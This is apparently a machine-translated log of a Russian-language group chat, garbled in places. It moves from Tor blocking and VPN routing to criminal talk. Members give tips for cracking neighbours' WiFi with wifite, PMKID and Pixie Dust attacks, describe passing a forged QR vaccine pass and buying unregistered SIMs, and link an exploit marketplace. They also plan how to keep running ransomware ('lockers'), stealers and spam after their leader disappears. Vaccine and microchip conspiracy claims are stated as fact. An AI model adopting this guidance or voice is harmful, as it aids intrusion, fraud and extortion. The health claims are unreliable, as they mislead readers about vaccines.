:) whoer gives out the address of the exit node, if you connect via Tor whoer ip found out typed in the address bar is it like that should not be? http://199.249.230.163/ This is a test for a connection to one of the nodes To all: check with curl http://152.199.19.160 -- if it says 404 then it's ok. If you got a Connection refused or something like that, it means that they block me in the morning at 9-10 hours, I was also connected, but before that even yota cut off my signal a few times. here I don't know if it was because of the snow or the mobile network was falling far away) have not reached me yet And the site itself opens from the russian. i requested a bridge in the settings of Tor - connects with ru ip without vpn. with vpn everything is as it was - no blocking But the Tor site opens through Tor! So i think the site was blocked. yes vpn dropped out, with it it works normally vpn, you like it you how? where does the link open? short IP already locked from the FF (just assembled)) also - Secure Connection Failed An error occurred during a connection to `www.torproject.org`. PR_CONNECT_RESET_ERROR I already caught the connection at the border of the region... Well, nothing, the world is developing, now at the border of the country will have to ... to download the source code, before it's too late) Or on disks from China to order Well have to travel / fly outside Russia, download there a browser ... guys, tor all goodbye, or what? `https://www.torproject.org/` - *Failure to connect to the site.* but from the tor browser itself all is normal... no problem with tor, I think they would rather block themselves than tor) by the way, Nakamoto only followed a fairly well-developed theory belonging to a specialist named Wei Dai, who published it in 1998. I looked it up about 10 years ago, my opinion is that there is no Satoshi Nakamoto. There is a specialist from northern Europe, I assume Sweden. Apparently he worked for Assange's team.
Finding his location at the moment without the help of Interpol is problematic. no offense to our radioactive comrade and colleague)))) i don't know what they are chiseling there, i think many have the same cranial cavity, as in Simpson Homer bombs in the ass of each other drunk and work we interfere with all sorts of crap in the law can even borrow some speech patterns) to the head of the RKN should collectively write a letter in the style of the Cossacks of Zaporozhye to the Turkish Sultan of the 17th century and deal with TORP Let Franz call the RKN ONI They even think about us? Well, yes, instead of a localhost A should be running Tor proxy on the VPS? By the way, Cloak is able to mask under https traffic not only openvpn, but also Tor. So, as an option, you can raise your bridge and mask it with Cloak. For Tor, Cloak has its own pluggable transport, as I understand it, so it has to work for Tor. Just replace 127.0.0.1:9150 in browser settings with grey IP_vpski:9050 and traffic will go through tunnel IP_vpski in the sense of grey IP through tunnel or you can do without transparent proxy, just connect to IP_vpski:9050 with browser as socks-proxy. So Tor traffic will also go through the VPS. Without default route, with transparent proxying Tor hosts are mapped to gray network 10.192.0.0/10, and Tor also has a built-in DNS-server. Onion sites will resolve to IP from this range. Then you only need to register this net to VPN and add transparent proxying at VPN. All this can be automated on Ansible as a script to configure the VPS and deploy it in a few minutes. Which I'm already doing.[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=5ouFy95g3WCSMMz4k)

```
# interface the VPN tunnel comes up on
interface=ppp0
# IPs of relays carrying the Guard flag, taken from Tor's cached consensus
listip=$(grep -B2 "^s.*Guard" /var/lib/tor/cached-microdesc-consensus | grep "^r" | awk '{print $6}')
for ip in $listip
do
  echo "Add $ip to route..."
  # host route via the tunnel interface; Linux route(8) takes "dev <iface>", not the Windows "mask ... gw" form
  route add -host "$ip" dev "$interface"
done
```

I.e., I also think it's strange to choose nodes, every person should use his own VPN to go to internet as it was before. Why do I need routes? The default route is prescribed by VPN itself and that should be enough `https://metrics.torproject.org/` the first time I've seen this section of Tor. route add <ip> mask 255.255.255.255 gw <gateway> `grep -B2 "^s.*Guard" cached-microdesc-consensus | grep "^r" | cut -f 6,7 -d " "` this is also possible in git* I've seen it too, that's where all sorts of cisco filter lists come from... I'm asking you, I'm telling you `grep -B2 "^s.*Guard" /var/lib/tor/cached-microdesc-consensus | grep "^r" | awk '{print $6 ":" $7}'` https://tor.stackexchange.com/questions/14697/list-of-all-the-entry-nodes https://github.com/SecOps-Institute/Tor-IP-Addresses where is it? I don't know, but I saw a github repo with a list of all known nodes, and a list of exit nodes. It's updated like that, it's often a bash line - cat / sed / grep all sorts of things I had a tor working then it got shut down the RKN blocked everything. no fucking way to get through. I still have the Tor cache. how do i get entry addresses from the tor cache? @ruben @benny tell me how to get a list of entry nodes from the cached-microdesc-consensus file Say i put my tor bridge on a VPS Will it be possible to make this bridge not be given to other users? In this case, making a special bridge is, imho, superfluous. Through the VPN it should work without a bridge. Unless, of course, openvpn is blocked. And if it is blocked, then you can use something like Cloak. P and B. can solve something there, cybersecurity in one of their agenda themes was like Kiselev on Sunday will tell what's what, I do not think) coincidence) If the VPS install tor bridge. I would like to add it to my tor browser. As this option, bad or not ? Simply, when you raise the VPN add the default route to this VPN, ie, all the traffic goes to the entry VPS. And there already on the VPS wrap the traffic with transparent proxying into Tor. And use the DNS-server on the VPS.
Then all will work transparently without any additional settings in the browser. As a result, all the same connected and works up to now))) today in the morning, yota for an hour and a half cut off my connection (modem) - was running tor without VPN (not working laptop), surfing on torrent-trackers stupidly. after restoring communications launch tor again mobile. I do not like this option of copying a tor browser to vps. Traffic to onion sites can be transparently wrapped with iptables into tor on the VPS, I have done so myself. It is necessary to lay the route correctly it is nonsense, no need to copy anything anywhere, Benny, I mean just copy the tor browser to the VPS, and run it there. As many are now doing who have tor blocked double, even triple Rub, well, properly, the tor within the VPN... And that DNS-traffic went to VPN. Ryan, I do not understand what you mean... Why the dedicated server? Just use Tor on top of double VPN as we do it. In case they start to block openvpn, mask the traffic of openvpn under https with the https://github.com/cbeuw/Cloak thing, and at the same time install there (on the entry node) Tor and caching DNS-server (just in case the DNS-replies will be switched). All this should be implemented as a script on ansible. In the browser prescribe Tor, running on the VPS, in the form of socks-proxy. Provided that it's dedicated servers, and not VPS Fellows, is there a solution to encrypt the drive on the VPS so that the hoster never opens it? Is it? the first round of encryption happens on your machine Silver, I do not know, maybe easier to make a grid of their own private bridges VPS option is simple, but there is a serious drawback. The server side can see what I'm doing in tor browser, all passwords are lit, etc. is this a solution? @ruben @benny what do you think? then both on linux and on windows it will be possible to cling to any VPN of choice, and use it as a bridge. i.e. simply set ``` route add <ip> mask 255.255.255.255 ppp0 ... ``` I need a script that will shut down access to all the Tor nodes through such-and-such address The easiest solution - each takes a VPN (7 bucks) in Europe - there raises VPN - and through this VPN goes to Tor they suggest that double VPN is needed Rub is busy with the script Hello All Has anyone come up with a temporary simple solution to the problem with Tor blocking? Like take the cheapest dedicated server and put a Tor Browser there, and so go to Tor? Or something like that. Man, if I now tell you everything) there will be a whole poem) guy just came to pull the wool over everyone's ears, to scoop the dough and left) such as the architect who came, while he had the entire development department just stood for 3 months and in the end he got fired) and then there were a lot of slow moments it should be updated or in 2 if I am not mistaken, from scratch to the off-line launch seemed to have gone in 2.5 years old I want to say the devs were not very qualified those who worked in the last office in the city N were cut) before the launch, I have not lived, because they all moved to Moscow and rented a cool office and picked up the development team Tammy i used to work for cryptocurrency startup "credits.
com" We built the alpha version in 3 months which helped me save 24k efir in ico and i would buy all the stuffing from scratch - no offense )they say bittorrent with all the knowledge accumulated over 10 years )but if i let our team write my own bitcoin clone, i would buy 3 experienced coders for 6 months ) but the world knows how long this project was nurtured and tested before its first launch?@homer all the solutions were already built into the original project yes, it was polished but there was nothing drastic there were even already proto-smartcontractsmechanisms of rollback blocks when the loser chain is rolled backNow the bit code is supported by more than one programmer, i think if you find the code of the first version (at startup) you may well understand it So just download the bitcoin code and try to understand it), and then we'll come back to the question that it was done by a single programmer )with a lot of non-standard data structures, an excellent designer to design essentially distributed non-classical DBMS, he should also be an expert in building peer-to-peer networks, an excellent c++ programmer further on, let's say there is such a guy, for some reason unemployed what is the chance that he will invest years of effort in such a magnum opus? and where do cryptanalysts live) in what sectors of the economy, so to speak ) this question: is it possible to hire a cryptography expert in the job market? to know at least the structure of the otr, not to mention Not to mention attacks on random number generators, cracking ciphers, etc. ? 
i do not believe that this is the cia, in this area must be a real genius, or some university. or a friendly team of many experienced engineers led by mathematicians and cryptographers to design such a system, debug - a single person can certainly be, but it is a genius genius genius if the bit was written by one person, he is a genius There's a hell of a lot of developments and ideas, and he's already dead, by the way, a lot of legends)) Satoshi is someone like Nick Szabo, too little information about him is known, although he's a professor, giving lectures at some university, even his birth date is hidden. 95% that it's him http://www.securitylab.ru/news/527291.php who heard about bitmessage? the size of UPSA boxes the size of skyscrapers?)) Someone has yes, someone does not. So they have boxes already standing Silently press the operators, implement. I mean, not in terms of storing metadata but in terms of storing traffic itself So for a long time now Anybody knows, is Yarovaya's project being implemented? And in general, go to work at the factory) in the staff) > requested)) to remove the link to tor-browser.exe from the site Yeah... but what about i2p?) these are sad times) I already read that yesterday the RKN wrote a letter to tor and asked)) to remove the link to tor-browser.exe from the site, it will be a backup link, and we will continue to work there. torrent works as a peer-to-peer network and allows you to find out the address of the interlocutor, you need proxying for anonymization the first thing to include in it proxying through socks5 add me in it - start a tox for every tricky >|< ass found >< yuy with a hard drive) for example, here with one person communicated, i got Tor with a VPN, he got Tor without it but the rkn is already making statements there 3) security of Tor is highly questionable 2) water will find a hole 1) there is also the idea that it was not us who blocked it What do you think about blocking Tor in RU?)
Where to run or will be like a cart) They say bridges bypass the blocking) https://alphazine.ru/showthread.php?t=2789 @all in the theme bechdor revilne, I turned on the phone to turn off the alarm (so fucked up and I forgot to turn it off) and turned off the bluetooth - battery lasts longer nova fun aha, now we will catch pokemon :) By the way, thanks for reminding about the bluetooth, at least turned on the phone and turned off the clock night boudoir) @ruben `https://youtube/kJfe0TMHjDc` Fouguet Family name is strange, he is also gay? :laughing: all go to the village to this grandma from the video!!! weldon decided so call the technology Web 3.0 -- decentralized internet of the future Ahhez, from what movie is this taken. Terminator, you say? skyNet??? astala vista baby????
) https://lenta.ru/news/2021/09/08/fage/ https://vc.ru/future/26886-personal-biohacking see, you can watch directly from the internet as streaming posted this video on skynet: https://siasky.net/AABU9_47P83azwu2N8spRA8w7r1vKwVMrdZnfjZM5qHiog silver normal rfid chips (which are under the skin) are pretty big. And these are tenths of a millimeter or less. Plus the rfid is powered by electromagnetic induction, and here by microwaves or body heat. Technology doesn't stand still. I'm kidding. You're talking about seriousness. >Patented technology from IBM. I do not need to explain what this means, but if we are closer to reality, something like an rfid tag can be put into an injection Powered either by microwaves (they say that 5g has the optimal wavelength for this), or by body heat. Nanopunk? ) And wireless microcomputers are already a reality. Go and read about "smart dust" which is a technology patented by IBM. They created a complete computer in the shape of a 0.1 mm piece of dust. I am not there, I'm not vaccinated there :grin: on modern consoles there is no 60 fps depends on the performance of the console I gave you an example of something which is impossible You are saying that nothing is impossible and what about toys? honestly, i don't get the humor -- i'm not a gamer i'm not a console gamer about consoles like PS 5 @ruben it was a joke not for everyone) there's a video, on telegram on what consoles? >nothing's impossible why is there no 60 fps on consoles then? i haven't run a bluetooth device search for a long time, but i have to check it. nothing is impossible, if there are nanochips Graffiti nanocomputer )) are there really IT specialists and engineers here? are you serious?) loooooool what does it say?
"A vaccine with a digital footprint," as Health Minister Murashko put it. Vaccinated can be seen by bluetooth as a MAC address: https://t.me/c/1558684436/19075 (who has telegram). If there is no water in the tap... taki goo hackers (tm) like no longer relevant? )))) it was not them all? ) southern region :) but our grass is green, butterflies are flying so what do you say ) oh my god! https://www.zerohedge.com/news/2021-09-24/financial-disclosures-reveal-white-house-press-secretary-jen-psaki-was-employed White flies have arrived - Winter is coming :woman_zombie: Ural, I walked on the yellow/green grass 3 hours ago, and now I got up from the PC to pour coffee - all white) Central region? all have a good morning and productive day Say Monday!) rocking this world?)) okay, thank you) hi, works + good morning and productive week to all :) jabber works?) here? If you have, [write] in private, I'll give the wallet. good morning all, guys are there who can send $500?
I need it urgently, right very much. I will give 550. At least you'll have money to eat. Get a wife and you won't need buttons, now it's keyboards, tomorrow it's spontaneous crap, we're past it.. you do not understand.... (c) for suckers in short it seems from the category of gold-plated wires for 20K for headphones for 50K because there's a cool sound, and you do not understand this "trend" from the series of pathos, like, well, this is an instrument, I'm beating the cabbage with it ... The main thing is that you have to be careful when you think about it... You don't understand this... It's so confusing, a person you don't know dies, but after a series of events, you will still feel like shit and you will pay for it... I understand it and I even accept it... I don't remember the name, I think it was called "The Button" - the movie where they give you a box with a button on it.., If you press it, you get a million dollars, but the person dies at the same time (sorry) I do not need it)) is, but when you press it, your money flows away no, but there is a button - masturbate on my keyboard even for 1ka button "money" there is no special? there's a whole cult out there where they change the buttons, they buy a stupid keypad for 100 bucks and then customize it. maybe they missed something, but what's the new fashion for wanking on keyboards? Well... the bridges rock, it's scary :smiley: Yes, the wind is getting stronger))) Tor is storming maybe I have something wrong with it without problems no, jabber is working yes, by the way, Caesar is planning to come back, do you know when? everything according to plan, like letovai teethe like angelo) hiva like tsoi ! I have dohlada, did not die today + + Jabber works for all? Thank you! Both of you!
`fakegenerator.net` The domain there is always changing, it seems to be what we need... won't 10minutemail be useful? "Please use a work email address. Free email providers are not accepted." You have to register at the service and it only takes corporate... Hi! where can I register corp mail? oh, booze and the bike in general go side by side (you don't fill up the bike and yourself at the same time, cheaper to drink) full-suspension from 115k... need to upgrade the bike, and nowadays it's not easy. Entry level from 40k and you don't know which one's better in the uppers, it's a KTM. these mtb norms are Italian. motocross bikes. sspr hello! 10 VPS, hello.
there is a question about assembling one shit @all and are there go specialists? it's ok) there, he's cyberpunk) That's what I mean too. QR code, all of us, against all odds and sorrows. The same Gintsburg at first said that after his vaccine there's lifelong immunity, and it's even bequeathed to descendants :) -- he doesn't say that now. He says that the vaccine gives no guarantee and it is necessary to be constantly revaccinated. Yes, "officials" have long contradicted themselves. In Kazan and Saratov, they write that without QR codes they are not allowed into banks and ATMs. There is a checker standing by the ATM. If you don't pass the test you will be turned away. Even so, officials say that the vaccine offers no guarantee against infection and that a vaccinated person could just as easily be a carrier.
Yesterday I went to the grocery store to buy chemicals and there was an ad on the door: QR on admission. Shopping malls, restaurants, cafes, all QR for the past 3 weeks. Truth be told, where I live, on the outskirts of town, the worst that I met was the requirement to wear a mask in the supermarket. I live in a quite large city, unfortunately (the 2nd largest city in the region). That is why people are fleeing from large cities in droves, to "leave the system". In general, they plan to drive everyone to the metropolitan areas, to manage them more easily. Small towns and villages may drop out of civilization and turn into "big Somalia"... But first, the reservations, where would they be without them? They are already going to embed a photo in the QR code picture so that nobody could use someone else's code. There is a need to draw at leisure what is necessary to scan your passport. There are the same initials, date of birth and a few digits of the passport series / number; when scanning it shows them. Well, it is not like a left one. It belongs to another person, an acquaintance. Not accurately expressed, I meant not with my name. Garfield, a left QR code? You mean from some database that was leaked? All for the purpose of editing the DNA. For example, to suppress the action of certain genes; for example there is a certain "God gene", which seems to be responsible for religious fanaticism. This is the way Bill Gates proposes to prevent religious fanatics (there was a video "Bill Gates is going to correct the God gene"). And other genes, for example, want to develop obedience in the people, so that they do not protest. Yes, a genetically conditioned caste system. I have a left QR, so far almost everywhere they allow me to pass. need to draw a passport as well and in most cases it will pass. the question is whether for long it is so simple to scan with your smartphone and that's all. so far in many places a passport is not required, somewhere they even say "fuck, come in".
but it's up to the first fines, major such liberties allow themselves. No, the account in the centralized registry will include a transcription of DNA. Well, not surprisingly so, if now the QR scan is often done by the shop / cafe workers themselves, if it is small and there is no budget for a separate employee. in the nearest future this will be tied to a state body or some other, where a person will not stand with a cell phone with a scanner geared specifically for this purpose. they went even further - a genetic passport. well yes, at first they wanted to introduce a universal smart card, then progress advanced and it became unnecessary / corporations / corporations / yes, now they issue QR codes, each time it is new. Then they want to make a system of identification ID2020 (https://id2020.org) from Microsoft and the corporations. There will be a person's account in the centralized registry, and the link to this account will eventually be encoded into a QR code. Also, if you poke around the id2020 site, there is a link to a curious googledoc, with a tech requirement for the device. The description is very similar to an implanted chip. that immediately grabbed and carried for processing. they levitate the octopus out of the matrix, it is being developed probably))) as cattle in the backyard began to track, like this. It will be for example a drone flying down the streets and scanning people for "permission" to leave the house. I remember notes on fences / walls 4-6 years ago - in our city, all replete with the same phrase "we are against the UEC". Universal Electronic Card. That is what it stands for. We are now at a point where something like this has been implemented all over the place. QR is just a transitional link to more serious means of identification. The essence of "inclusive capitalism" is the abolition of private property and a distributive economy. I.e., there will be no private property and no equity, no share in any enterprise.
Instead of shareholders, there will be stake-holders -- secondary beneficiaries who have no stake. Personal homes and automobiles are going to be abolished. That is, there will be rented housing and carsharing. The middle class is being eliminated, no animals are allowed to be raised. (Have you heard there's now a law that says you can't raise animals on summer homes? -- now drones are flying around and tracking who has a chicken coop, who gets spotted -- fines). Social distancing is being introduced, everyone needs to stay home and not gather more than 3 people. All to take away the basics of self-sufficiency (personal farmstead and vegetable garden), so they are dependent on the system, plus to fragment society to the maximum (so they do not protest). QR codes are another tool to cut off the dissatisfied from the social infrastructure. I meant to blame it on the virus, the "collapse of empires" and the economies of the world. of course, all the reasoning now is like a pitchfork in water, and when the true goal is achieved, our generation may not even see it. Although judging by the pace the situation will develop more rapidly day by day at the most miserable time, our kids may get stuck in the middle of it. Even the globalist ideologue Schwab talks about the transition from capitalism to "inclusive capitalism". There has been a collapse of capitalism and a change of formation to post-capitalism. Like any war, the goal is to drain the economy to zero, to bankrupt small and medium-sized businesses. So there will only be big monopolies and poor slaves, no middle class. That's their plan. In reality there is a lot of information on anti-covid-vaccine channels about people who have died after vaccines; for example, the editor of Literary Gazette had a 19 year old grandson who died of heart failure two days after the injection. All kinds of thrombosis.
If the thrombosis occurred in the brain, it can be a stroke, and a leg or an arm can fall off, you can go blind, and such cases have already been. I do not remember this game because of age. I just went to school in 96-97))) or 95. me, I still played this in 96, ahaha, under DOS. further it will get worse; to dump everything that is possible, but the problem will not be resolved, only aggravated http://www.youtube.com/watch?v=7uDrgNkQu14 Blame it all on an unknown virus, good idea, sure. It seems to be the gist of the plan. My father's friend's elderly mother died right after the inoculation, and the frog was jumping on lilies to the anthems of the USSR. perestroika was a child's game. Civil 2.0 ?)) and we'll get well) without these capitalists you can just make a coup, take from the rich and give to the poor, and go back a century after the nuclear war. There are many things here. I see several objectives: to deal with the bankrupt dollar and to hold a new world war in the name of some of their own objectives, incomprehensible to ordinary people. for someone the vaccine can simply be a catalyst for the activation of any chronic diseases. A friend at work, a man died specifically after the second dose was injected, a couple of days later - first-hand information, I have no reason not to believe this man. For half a year they forgot what it was and all survived it, just then no one had to stir up. in 2001 or 2003 there was SARS, the same everything, pulmonary edema, corona, masks. I also heard about the globalists before and did not believe it until there was this hysteria about the world because of a non-scary disease. What's with the argument and no fight? They've gone from talking to acting...
The keyboard's not working, the batteries are out... yes, yes, exactly, the so-called "golden billion" theory promoted by the Rockefellers. "golden billion" may be for the best, but don't get me wrong, it's not a vaccine against a dangerous disease, it's a tool of population reduction by globalists. I won't argue, everyone decides for himself, I'll go soon for revaccination. factin pits your immune system against you, i.e., it is a tool of genocide. From factcin the public dies of autoimmune disorders. Vaccine does not protect, it allows you to transfer the disease with small side effects, in most cases. I.e., factin does not help from a fashionable disease, but only makes it worse. It is a lie, in hospitals 50% of patients are factinized. Remember, during the entire Afghan war, 15k soldiers died, with the Russian vaccine? I read a statistic. 130 (Japan). population ~80% vaccinated, 0 deaths a day, in russia every day a titanic sinks, ~1500 people according to the official figures. so they died from vaccination, mostly, and from the failure to provide medical care. I see no reason not to get vaccinated, so many friends and loved ones were killed, ppts. Can we hold a poll? Like "who was vaccinated?") look at our dark statistics) https://stalingrad.site/articles/zagruzka-v-matritsu/ downloaded the image with mikes for 5 min. Wow, I download the studio via LTE - up to 6 MB/sec. Something microsoft messed up obviously. Considering that I live not in a big city, and there are no exchangers nearby. Ask the exchanger to send the cash by courier - too expensive, it will have to pay the courier airfare. "friend, take the money huh? I'll give you 500 rubles..." "1500 and a bottle of good vodka!" or a friend will go cuckoo when asked for cash and delivery) It turns out that soon the paycheck will not be cashed either. What to do? "From Tatarstan they say that people without QR codes are not allowed into bank branches and ATMs to withdraw money. Similar things are happening in Saratov.
Everything is happening much faster than we thought. We should not forget that Tatarstan is a testing ground for the whole of Russia." but to break WPA2 on services, with their rigs, rather than race their video cards. PMKID is good when you need to produce MitM and there are no clients; at dachas exploit it well, grab the handshake, wifite and airgeddon solve it, the main thing is to install all dependencies, there are these libs http://www.opennet.ru/opennews/art.shtml?num=56217 https://www.opennet.ru/opennews/art.shtml?num=56049 the only thing needed is a normal wifi whistle, alfa for example, https://www.wlan-shop24.de/alfa-network-awus036nha-wlan-usb-adapter-atheros-ar9271l androids also have something, but they screw up the points. It is also desirable to have a good directional antenna, because there is already a lot of noise in the range. PC or smart? install wifite and go, first thing on the WPS hole, Pixie Dust. by the way, who tried the neighbor's wifi? I catch 10 pieces from the neighbors (some pass must be 123456789qQ) I have it all solved with Ubiquiti. And who lets the wind into the internet?) Let him sit in a virtual machine, you can use it only in the local loop and only regarding the question about old models / firmware. Yes, Stas. Maga, but it is under the wind and drains all the gurmuot. Stasyan, router-scan? on the tree? I'm opposite at 800 meters. Easy, there is a convenient utility for win. router-scan. Very handy WPS break. if the whole house is 100 apartments and 99 use the internet and you do not, it's you know how tough a palaver) * a decade I do not use your net. mitzi, you have many "neighbors" on the hook? The main thing is that the antenna on the balcony does not burn. so it seems burned, not AI, and Indians outsourced... that one AI? in general, the problem with the internet is solved by Ubiquiti NanoStation or Ubiquiti NanoBridge M2, you put OpenWRT there, something like airgeddon, reaver, wifite etc. Yes, with human degradation AI may well reach his level) the main thing is the result, it may even leak wherever he wants.
this is the approach, such a neural network architecture. I've nurtured the idea of creating a "cryptor" + "api checker" + "neuronka" for ages. now these gpt-2 gpt-3 already simulate a blonde's brain very well and even brunettes. don't speak about clouds but about the compiler's conscious decisions. we'll wait till it starts working without clouds. you say it writes code for you. it is true that everything goes to the mice in the cloud, so there is an autopilot from the mice - even the call center at sberbank is already an automated robot without people. i have always thought about it and why not? Why haven't they invented something in coding in our sphere that will work for us? When we automate everything, we'll make the neuronka retire) when I get bored, retire, get fired etc. I can imagine a security guard with a laptop in front of him) robot or not - it's a test, you can either laugh or cry... To be a security guard? Are we splitting up already?) well, the elite elite rzhd rather a fiver? i personally decided for myself that i'll join the security service, it's our age-old russian profession ) fences, barriers and guards) no, barriers will not be demolished, they're our scrapes, barriers will be taken down, they will be treated as terrorists. but i'm talking about that or the barrier)) so they will sell SIM cards without a postal code )) no way out, they can figure out how, there is plenty of equipment that needs SIM cards and does not have an account on the government services. the laws and their implementation have always been different. prices will go up... so these are corporate sims and i want two phones, they won't sell them to me? well, the sims that were sold are not unknown and they have to be registered in their name or someone else's... as the Frenchman said. I've seen some people receive a text message with their passport to come to the office, we want to verify the data.
I get a call on my left SIM card and they say, hey guy, don't you want credit, it's already approved at Musk's prices... so, the telcos can always defend themselves and include Ludwig Aristarkhovich and say, who did this? who did this? they'll make SIM cards without a name, on a white background, and who among the shoulder straps and civil servants will be able to understand the routing, because the technical experts here don't even understand how the fuck GSM is organized)... this is an interesting variant... it seems to me that the solution will be roaming ) and then only to register for real people on the public services. No, since December 1st there is a new law on the mandatory tariff, 1 sim - 1 login to the services. is there a law that will turn off all unknown sims? all subscribers will go on a binge? anon, a lot of criminals need sims, and they will have to register them for each employee?! It can not be that so much money will go to waste... i.e., 2/3 of the profit. According to some data, 2/3 of subscribers will fall off from the operators > From the 1st of this year, all this joy is going to be shut down... we'll see... i wonder, but i think that very quickly a method of circumvention will be discovered; like wiseguys from prisons will be closed in other prisons? so it's better to go to the churks, they do not care, they have everything covered, they know all the local legals by face. the tent salesmen are shy, they look whether you look like a legal and if you look like a cop they tell you there's nothing. Sorry. They are going to shut down all this joy starting from the 1st... We'll see... even Ali-Express is selling SIM cards. What's up with that? :) At any phone repair shop, they sell SIM cards. And the sellers must register these SIM cards, otherwise they will be fined. There is a fight against gray SIM cards, so now you can buy and register a SIM card with your real data.
I remember a guy who decided to sell a grenade launcher through Avito:) Through churks, it will work, they always have tons of SIM cards to call Tajikistan, you are not my brother, you black churka... Buy a SIM card :grin: I did it that way, it works. if you ask about SIM tents, they will not sell them, they are afraid of the police, so they have to sell registered SIMs; they sell them in tents that sell them for no reason, all these stalls with shawarma, moshetiyon will give you everything. try to do it that way: - look for a local gathering where salaam aleikum. Find the friendliest dude who tells you "you need figs, brother, turmeric, mursmullah, brother." You say no brother, thank you from the bottom of your heart brother. He says, what do you want, bro? I'll give you anything. You say, "Brother, I need a SIM card, brother, I really need one from the soul". You can still buy one at the markets in major cities. I'm waiting for the 1st date and what will my SIM seller say, how will it all work in connection with the require/verify for services... Because local shops do not want to bypass the law, and the bruises go without passports for the internet. exploit sells wherever https://exploitivzcm5dawzhe6c32bbylyggbjvh5dyvsvb5lkuz5ptmunkmqd.onion/forum/94/ depends on what city. for the internet? Or just for a number?
No one has seen where you can buy an activated SIM card online? did the trampers give out?) good morning. Chinese Air Force fighters entered Taiwan's airspace, and naval ships invaded territorial waters. Taiwan's defense ministry warned to increase alertness after the air defense detected nine Chinese fighter jets. CNN, citing U.S. intelligence data, reports that Russia intends to begin air strikes on Kiev starting at 03:00 Ukrainian time... Good night bro, it's time to go, get up early tomorrow, the sofa troops are not waiting to see =) @rags it? the last joys will be taken away from us all, here we go) Some american senators suggest blocking PornHub in Russia in addition to social networks! :( You must have over 300 reactions to view hidden content. ))) Who can send the link https://xss.is/threads/58221/ see sura =) Besides lockers now all topics seem dead - bankbots, stealers, etc.
all this is already in the past. If I'm wrong, correct plz, maybe there's something I do not know; if anyone has any thoughts do not hesitate to put them =) =) pfft pfft pfft pock, lots and lots of woods) it's good in Siberia, fresh air =) colleagues, go take a break for a while. as there is no law about crypto, you can excuse yourself more in case of a fuckup. crypto collection and interception of all known wallets, to work like a submarine, work and leave a trail more or less; gray software can fuck off, in short with the old software it will be pale to resume work. your suggestions gentlemen? if you do not want to go to Siberia =) but the idea is clear, paranoia should be there and while they are not at the cafe, they have installed torrent nodes on their bridges and fuck it =) or you can expose who did what; if they spilled the money they would work without lavishing, they would even rent a cafe to work when they had a lot of money and many eyes at once. the ryuks have a new locker to get out from under the sanctions. they are still on the move. are you sure it was revil? well revil, they probably took it, maybe the boss had something to do with it, hz. mg, no one took anyone else, the rest they already told themselves. they took them just because they showed off their posh life very strongly. the trick is that they could have asked us to work while the infrastructure is alive to earn something. because of the reception? that is a different question. The activity has stopped not only because of the money; it seems that there is some life here, even with such vague predictions for the future, and we are waiting, just do not die of boredom, from Francis to wait for news... =) my last name is too well known to be mentioned (s) here's where the people who wrote the crackers and other bullshit should worry if the chief got so fed up =) last name is not enikeev?
I should have thrown it to zhabun in public, if it's a problem, here's my resume in a nutshell: php coder since 1998, engineer, programmer since 1980, higher education. I've been deep analyzing traffic on gmail servers, creating a mailer for yahoo and aol, and I'm close to the finish line. toad jameswatson@xmpp.jp, contact Atomik and other wallets. What kind of software takes logs? Lockers - it's more likely to be a fucking idiot. Someone will make a leak for 20. pfff so there would be less palaver. Lockers are terrorism =) for super profits - no. There are other directions besides Lockers? There are other directions besides lockers. Kneel with recipients, agree on a price and let's work. And the admin panel of the software is alive? You can do it without the panel by hand. Well, recipients pay for crypts, it makes sense to try to repay them themselves without a paycheck, there will be no paycheck. Secure your paycheck, and then deal with other issues. Stealer to do shit. Can also send stealers. What options besides spam are there? who does spam? not for a long time, really. are there any coders? what are you talking about? let's get the coders and the clients to work out the finances, e.g.
cryptopanels and so on? i can fuck it up, i used to be a CFO :D the new chief will be either french or elroy so he could control the work =) Angelo, make him a chief and a bookkeeper, we need a new chief =) we need Kolya if we can try to make something happen, what's the point of waiting for the weather? he's not sure yet, France said only that everything is in the fog =) or look for a new job with a salary or work for free now for perspective. i can find them for sure, i can find contacts of people with lockers, but there are nuances @angelo so look, we have the tools we have. Chief gave big customers to solve the problem with spam and servers. Kere you are wrong. Yes, what did he coordinate once a month, we'll organize through the pussy. Corporate everything we have, the tools, so the chief only gave money. Chef, he merged. Why has all the work stopped? besides money, what do we have? to give them access. Anyone has contacts with the groups of lockers? there are only us! i don't have admin, software, spammers and proxy-type shit. i'm a fucking companionable guy, i'm as reliable as a rock, i got 16 pffu. we got a support team and a bunch of guys i can fuck around with, i offered to knock on my toad, who wants to communicate, who has what? i suggest someone else responded? or we can organize ourselves in the course of the case; it is clear that the case is dark... because we do not work, just go on, lol, we loaf in chat while it works @Garfield look for a new job. it is unlikely it will resume. World is my wish. @all though, I certainly hope that our work with you will continue in the near future. And without any shit and, just as importantly, without any fans working to spread it in streams of incomprehensible air masses. I get it. why the fuck look for some work, right? let's give someone a fan and someone a shit. And we'll organize a watch. What do you think of this idea? I don't know if it's the next heart or whatever they have, or if they'd survive going down to the subway, or there'd be partisan units.
What would she do? Fucking LEE: And what about Her Majesty Elizabeth II, by the grace of God of the United Kingdom of Great Britain and Northern Ireland and her other kingdoms and territories, the Queen, head of the Commonwealth, defender of the faith. This is not Europe, fuck it, in the annals of history about China and so it is clear, he is as friendly as most of the Asians are to Russia. So fuck it. China is the same friend to the whole world, because this state has only recently begun its ascent in this form. :expressionless: At the same time - everyone knows how successful it is to fuck the guys from siberia and to fuck the men of the ragheads on their part, we still have to answer for the halcyon goal, to fuck, to buy the forest. We're just raw materials for them and nothing more. Only non-Communists can jerk off to them in the hope for a bright future. They are not even comrades, the Chinese are not our friends.) srkzm was flashed here where it's like a boa constrictor, it's like a boa constrictor, it's like a boa constrictor, it's like a boa constrictor, it's like they love the pindos and it's like a dubious deal)) yes nigger chinese will eat us up. they will not fuck us up at all. If you're trying to explain something to a patriot or talk sense into him, an old communist, then I have bad news for you. What's wrong with the ZHPPP? It constantly fucks up guys, haven't you ever driven around Moscow in the center using the navigator? All this would be funny if it weren't so sad. :copyright: in principle, all this was expected by the general public for at least the last 3 days. The direct address to the whole world from the GDP sounded like a formal warning, within the framework of the signed agreements with the LDPR, but in the end it was an actual declaration of all the "yesterday's partners" already in the full light as the enemies of Russia. With all the ensuing consequences. Why did ours miss so badly?
